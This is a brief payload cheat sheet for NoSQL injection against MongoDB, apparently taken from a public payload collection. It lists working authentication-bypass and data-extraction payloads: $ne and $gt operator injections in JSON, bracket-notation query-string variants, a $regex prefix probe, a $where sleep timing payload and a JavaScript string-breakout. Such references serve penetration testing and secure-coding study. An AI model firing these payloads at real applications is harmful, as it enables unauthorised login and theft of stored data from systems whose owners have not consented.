NoSQL Injection
MongoDB and friends. Use operator injection in JSON bodies and bracket notation in query strings to bypass auth or exfiltrate via boolean/regex conditions.
Tags: nosqli, mongodb, auth-bypass
Controlled probes
{"username": {"$ne": null}, "password": {"$ne": null}}{"username": "admin", "password": {"$gt": ""}}username[$ne]=1&password[$ne]=1username[$regex]=^adm&password[$ne]=1{"$where": "sleep(5000)"}';return true;var x='
Source: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection